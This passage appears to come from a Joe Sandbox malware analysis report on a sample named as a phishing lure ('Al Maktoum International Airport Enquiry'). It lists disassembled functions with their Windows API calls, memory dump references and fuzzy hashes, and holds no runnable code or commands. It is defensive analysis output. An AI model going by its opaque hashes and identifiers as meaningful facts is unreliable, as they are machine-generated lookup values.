            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
            • String ID:
            • API String ID: 1504782959-0
            • Opcode ID: 23d38de2f75f4b9a1f5db656f6b239f319ef3696ea8ae2186a7a00701d757c1a
            • Instruction ID: 8c6e52ae412c931d43f313a2a24a89ce1a136293a394248a4bf881184ff16e2f
            • Opcode Fuzzy Hash: 23d38de2f75f4b9a1f5db656f6b239f319ef3696ea8ae2186a7a00701d757c1a
            • Instruction Fuzzy Hash: 23112E75500509AFCB04FBA4DD86DFEB7B8EF18314B144065F606A72A1DF70AE04EB65
            Function 00CD9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,000000B0,?,?), ref: 00CD9043
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD9055
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD906B
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD9086
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 27b251139f180c24a5c7184a6b3ef2842a8ae359b9efd25c8bad3034f5ce34c1
            • Instruction ID: a217fad4e567be18b6cac59ca3d075eb3416e258489f334afe977f2e326e1cea
            • Opcode Fuzzy Hash: 27b251139f180c24a5c7184a6b3ef2842a8ae359b9efd25c8bad3034f5ce34c1
            • Instruction Fuzzy Hash: 81114C79900218FFDB10DFA5C884E9DFB74FB48310F204096EA04B7250D6726E11DB90
            Function 00C81290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • DefDlgProcW.USER32(?,00000020,?), ref: 00C812D8
            • GetClientRect.USER32(?,?), ref: 00CBB84B
            • GetCursorPos.USER32(?), ref: 00CBB855
            • ScreenToClient.USER32(?,?), ref: 00CBB860
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Client$CursorLongProcRectScreenWindow
            • String ID:
            • API String ID: 4127811313-0
            • Opcode ID: 47a2e48662e05eda68a126552b572fdbc988575004dfe5b9e6f5c254c6344c7d
            • Instruction ID: 4774c355122c4d4cbbf922884808714a8b250cd824928ef92e724b4bfa084aa5
            • Opcode Fuzzy Hash: 47a2e48662e05eda68a126552b572fdbc988575004dfe5b9e6f5c254c6344c7d
            • Instruction Fuzzy Hash: 80113635A00119AFCB10EFA8D889AEE77FCEB05315F500456F911E7251D730BA529BB9
            Function 00CE1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
            Download Yara Rule
            APIs
            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CE01FD,?,00CE1250,?,00008000), ref: 00CE166F
            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CE01FD,?,00CE1250,?,00008000), ref: 00CE1694
            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CE01FD,?,00CE1250,?,00008000), ref: 00CE169E
            • Sleep.KERNEL32(?,?,?,?,?,?,?,00CE01FD,?,00CE1250,?,00008000), ref: 00CE16D1
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CounterPerformanceQuerySleep
            • String ID:
            • API String ID: 2875609808-0
            • Opcode ID: 711219a44ed2b93bd86f9c5b682402b6b0b44e4ce5ca77f721fa2f4eabefe55e
            • Instruction ID: b5e6a800d01e386cb5d650f24e0c38d9f0b07f70e1da0d8e4dc9b1fddcd39b0e
            • Opcode Fuzzy Hash: 711219a44ed2b93bd86f9c5b682402b6b0b44e4ce5ca77f721fa2f4eabefe55e
            • Instruction Fuzzy Hash: 31115A31C1061DD7CF00AFA6D849AEEBB78FF09751F184059ED44F6240CB3056A08BE6
            Function 00CB7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
            • String ID:
            • API String ID: 3016257755-0
            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
            • Instruction ID: 9804fb4675bb78dc91d3c2f6905d27530280a89442e86bb85d2b85dac5ded811
            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
            • Instruction Fuzzy Hash: A3014E3644414AFBCF125F84CC018EE3F62BFA9351F598615FE2868031D236CAB1BB82
            Function 00D0B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
            Download Yara Rule
            APIs
            • GetWindowRect.USER32(?,?), ref: 00D0B59E
            • ScreenToClient.USER32(?,?), ref: 00D0B5B6
            • ScreenToClient.USER32(?,?), ref: 00D0B5DA
            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D0B5F5
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClientRectScreen$InvalidateWindow
            • String ID:
            • API String ID: 357397906-0
            • Opcode ID: 10828d7101d1d9222d94c6a9a74cd31351fd0d6c6f925aeb9d0a180a80c03785
            • Instruction ID: b94eda0f16cf56e30c3be6f73bab20f14898bf27d963d243743080351ae913e2
            • Opcode Fuzzy Hash: 10828d7101d1d9222d94c6a9a74cd31351fd0d6c6f925aeb9d0a180a80c03785
            • Instruction Fuzzy Hash: 041146B5D04209EFDB51CF99C844AEEFBB9FB08310F504166E954E3620D735AA558F60
            Function 00D0B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00D0B8FE
            • _memset.LIBCMT ref: 00D0B90D
            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D47F20,00D47F64), ref: 00D0B93C
            • CloseHandle.KERNEL32 ref: 00D0B94E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memset$CloseCreateHandleProcess
            • String ID:
            • API String ID: 3277943733-0
            • Opcode ID: e907a7fb4528c0f12e57fb6c814dddaf284545ba1084cac688a5bb3a0bfa5dfe
            • Instruction ID: 5f3b47e2f34d0563ff5d74784894acab85217615cc4acc5852e0f81f509e97ec
            • Opcode Fuzzy Hash: e907a7fb4528c0f12e57fb6c814dddaf284545ba1084cac688a5bb3a0bfa5dfe
            • Instruction Fuzzy Hash: 85F082B66483007BF2102B61AC05FBB7A5CEF0A758F040421FF08D6392E7725D0487B8
            Function 00CE6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
            Download Yara Rule
            APIs
            • EnterCriticalSection.KERNEL32(?), ref: 00CE6E88
              • Part of subcall function 00CE794E: _memset.LIBCMT ref: 00CE7983
            • _memmove.LIBCMT ref: 00CE6EAB
            • _memset.LIBCMT ref: 00CE6EB8
            • LeaveCriticalSection.KERNEL32(?), ref: 00CE6EC8
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CriticalSection_memset$EnterLeave_memmove
            • String ID:
            • API String ID: 48991266-0
            • Opcode ID: 2e509b07cc767b201b6bcf13e4753b604de75cc5153f55206bc3d1726a5032d1
            • Instruction ID: ceac9f43d7f364d2417686ed5749cca85ef8d0f9bd00372e2de8d14452544e88
            • Opcode Fuzzy Hash: 2e509b07cc767b201b6bcf13e4753b604de75cc5153f55206bc3d1726a5032d1
            • Instruction Fuzzy Hash: 77F0543A100200ABCF116F55DC85B49BB29EF45320F148065FE0C9E217C731E911DBB4
            Function 00D0C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C8134D
              • Part of subcall function 00C812F3: SelectObject.GDI32(?,00000000), ref: 00C8135C
              • Part of subcall function 00C812F3: BeginPath.GDI32(?), ref: 00C81373
              • Part of subcall function 00C812F3: SelectObject.GDI32(?,00000000), ref: 00C8139C
            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00D0C030
            • LineTo.GDI32(00000000,?,?), ref: 00D0C03D
            • EndPath.GDI32(00000000), ref: 00D0C04D
            • StrokePath.GDI32(00000000), ref: 00D0C05B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
            • String ID:
            • API String ID: 1539411459-0
            • Opcode ID: 2d6b07edcd937227bdbcedb066a637532c8ee902191fb004fff3b3b0b1d01fbf
            • Instruction ID: 3414298b457458be31a7e7169c5755913e02ab59301f3325bb7c81cfd48b56d8
            • Opcode Fuzzy Hash: 2d6b07edcd937227bdbcedb066a637532c8ee902191fb004fff3b3b0b1d01fbf
            • Instruction Fuzzy Hash: 93F0BE31000319BBDB226F50AC0AFCE3F99AF06310F188100FA19A16E287B54561DBF6
            Function 00CDA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
            Download Yara Rule
            APIs
            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CDA399
            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CDA3AC
            • GetCurrentThreadId.KERNEL32 ref: 00CDA3B3
            • AttachThreadInput.USER32(00000000), ref: 00CDA3BA
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
            • String ID:
            • API String ID: 2710830443-0
            • Opcode ID: ac24cf812a14a8e77f20d95aeca5a5cc06c7d8133b982801d1373ac72952584c
            • Instruction ID: 23655bd7a24294546200ed4a3e696df0004783f2b3111989c8cbdba898c99454
            • Opcode Fuzzy Hash: ac24cf812a14a8e77f20d95aeca5a5cc06c7d8133b982801d1373ac72952584c
            • Instruction Fuzzy Hash: 66E01531141328BADB205BA2DC0CFD73E1CEF167A1F508025B608C4560CA72C5408BB1
            Function 00C82218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
            Download Yara Rule
            APIs
            • GetSysColor.USER32(00000008), ref: 00C82231
            • SetTextColor.GDI32(?,000000FF), ref: 00C8223B
            • SetBkMode.GDI32(?,00000001), ref: 00C82250
            • GetStockObject.GDI32(00000005), ref: 00C82258
            • GetWindowDC.USER32(?,00000000), ref: 00CBC0D3
            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CBC0E0
            • GetPixel.GDI32(00000000,?,00000000), ref: 00CBC0F9
            • GetPixel.GDI32(00000000,00000000,?), ref: 00CBC112
            • GetPixel.GDI32(00000000,?,?), ref: 00CBC132
            • ReleaseDC.USER32(?,00000000), ref: 00CBC13D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
            • String ID:
            • API String ID: 1946975507-0
            • Opcode ID: d4168a6444925f71077a518ef43015d4837095ade83a2f199b6caa6da1f4cf68
            • Instruction ID: 5141920c9387789b72e90731412de7a5491cf587d8dad7c492976fcbd538a9ca
            • Opcode Fuzzy Hash: d4168a6444925f71077a518ef43015d4837095ade83a2f199b6caa6da1f4cf68
            • Instruction Fuzzy Hash: 05E03932100344EADB215F68FC4D7D83B10EB05336F208366FA7D981E187714A90DB22
            Function 00CD8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentThread.KERNEL32 ref: 00CD8C63
            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00CD882E), ref: 00CD8C6A
            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00CD882E), ref: 00CD8C77
            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00CD882E), ref: 00CD8C7E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CurrentOpenProcessThreadToken
            • String ID:
            • API String ID: 3974789173-0
            • Opcode ID: f3ff0e9d248c0e40ed3fe8747d382ab6ff4667c8868875800443a219e68900c9
            • Instruction ID: 41a3c1386f96d52d812c1bdeac346d10700723f20f5974d605edb7d407375a87
            • Opcode Fuzzy Hash: f3ff0e9d248c0e40ed3fe8747d382ab6ff4667c8868875800443a219e68900c9
            • Instruction Fuzzy Hash: 4CE08636642311DBD7309FB06D0CB567BBCEF50792F244828F249C9140DA348445CB71
            Function 00CC2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
            Download Yara Rule
            APIs
            • GetDesktopWindow.USER32 ref: 00CC2187
            • GetDC.USER32(00000000), ref: 00CC2191
            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CC21B1
            • ReleaseDC.USER32(?), ref: 00CC21D2
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CapsDesktopDeviceReleaseWindow
            • String ID:
            • API String ID: 2889604237-0
            • Opcode ID: 7a4b0fa4aa28787c753b3707cac1213482e9dd489987fa39304e2e114d78dbb3
            • Instruction ID: 51ac8558adca22dc05c61e59205fe3e906ba2bc0e5d727ba033b6d9048cba4d0
            • Opcode Fuzzy Hash: 7a4b0fa4aa28787c753b3707cac1213482e9dd489987fa39304e2e114d78dbb3
            • Instruction Fuzzy Hash: D7E01A75800704EFDB51AFA1C848BAD7BF1EB4C350F208429F95AD7720CB399541AF60
            Function 00CC219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
            Download Yara Rule
            APIs
            • GetDesktopWindow.USER32 ref: 00CC219B
            • GetDC.USER32(00000000), ref: 00CC21A5
            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CC21B1
            • ReleaseDC.USER32(?), ref: 00CC21D2
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CapsDesktopDeviceReleaseWindow
            • String ID:
            • API String ID: 2889604237-0
            • Opcode ID: ddbbb29997ea2c6d839eb00f8a33d1a869285755cd1268feaed8e41f9ff1146a
            • Instruction ID: b001e419e6dfe8b2e43cc9ca87764ce574823eaf53c54c17504a50e245d15da3
            • Opcode Fuzzy Hash: ddbbb29997ea2c6d839eb00f8a33d1a869285755cd1268feaed8e41f9ff1146a
            • Instruction Fuzzy Hash: 2CE0EEB5800704AFCB61AFA0C8487AD7BA1EB4C310F208029F95AE7720CB399141AF60
            Function 00CDB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
            Download Yara Rule
            APIs
            • OleSetContainedObject.OLE32(?,00000001), ref: 00CDB981
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ContainedObject
            • String ID: AutoIt3GUI$Container
            • API String ID: 3565006973-3941886329
            • Opcode ID: 60da2722e94f5dfa8209be5bddd10b24b5629d8a32f126019dfd188574bcb7a0
            • Instruction ID: 3395c83f287f32b521cddebae0c2e9889f1d09c90c95c38d47c1e859fac22929
            • Opcode Fuzzy Hash: 60da2722e94f5dfa8209be5bddd10b24b5629d8a32f126019dfd188574bcb7a0
            • Instruction Fuzzy Hash: 39913970600601DFDB24DF65C894A6AB7E8BF49710F25856EEA4ACB791DB70ED40CB60
            Function 00CEB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C9FEC6: _wcscpy.LIBCMT ref: 00C9FEE9
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • __wcsnicmp.LIBCMT ref: 00CEB298
            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CEB361
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
            • String ID: LPT
            • API String ID: 3222508074-1350329615
            • Opcode ID: 7015c99bff6547353fb6b290194346b081c9eea5306fe00ef53f95a630c8e586
            • Instruction ID: 40e796dcb35ef533533d089450ee56aff0d7afc9e9c91768aaac357d67c99078
            • Opcode Fuzzy Hash: 7015c99bff6547353fb6b290194346b081c9eea5306fe00ef53f95a630c8e586
            • Instruction Fuzzy Hash: 9D618375A00215EFCB14EF95C886EBEB7B4EF08310F15406AF956AB3A1DB70AE40DB54
            Function 00C92AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
            Download Yara Rule
            APIs
            • Sleep.KERNEL32(00000000), ref: 00C92AC8
            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C92AE1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: GlobalMemorySleepStatus
            • String ID: @
            • API String ID: 2783356886-2766056989
            • Opcode ID: 1916b5cf60752a700125b62952166b65ce476105a7c9b31412e4c855079070fb
            • Instruction ID: cfaf67bd3cb3daa817e837d48dcf444578f5778435ebfd7bd76e13d2a53293f5
            • Opcode Fuzzy Hash: 1916b5cf60752a700125b62952166b65ce476105a7c9b31412e4c855079070fb
            • Instruction Fuzzy Hash: A25157714187449BD320BF50D886BAFBBE8FF84318F56885DF1DA811A1DB308529DB2B
